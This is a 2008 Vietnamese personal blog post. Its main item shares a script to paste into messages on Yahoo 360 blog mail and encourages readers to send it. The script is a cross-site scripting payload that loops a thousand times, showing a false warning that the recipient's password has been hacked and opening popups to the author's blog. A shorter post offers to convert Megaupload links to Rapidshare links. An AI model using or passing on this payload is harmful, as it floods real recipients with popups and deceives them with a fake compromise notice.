Search google

Google
 

This is the place where I leave my scripts, my useful files, glad to have your suggestions. If you want to make discuss, please contact me at YM id bornbygoogle or my mail bornbygoogle@yahoo.com or simply let ur mail. I'll try to contact as soon as possible :) Nice to see you :D

Wednesday, January 23, 2008

Loi cua blog 360.yahoo.com !!!

Cac ban thu chen doan sript sau vao phan message trong mail box cua blog 360.yahoo.com roai send thu xem sau : :D

< script>
for(i=1 ; i<1000 ; i++)
{
alert('Hãy Change Pass! Mật khẩu này đã bị superguepard xâm nhập !');
window.open("http://bornbygoogle.blogspot.com/");
}
< /script>

P.S : Chi danh cho cac ku cau quay pha !

No comments:

Convert Megaupload links to Rapidshare links !

If someone want to convert Megaupload to Rapidshare links, please let me know, I'll do it for you ! ( for free, all ). If you want, please send those links to me, with the mail title : Convert to Rapidshare !. My mail is bornbygoogle@yahoo.com. Or YM ID : bornbygoogle.

Nice to help you ! :)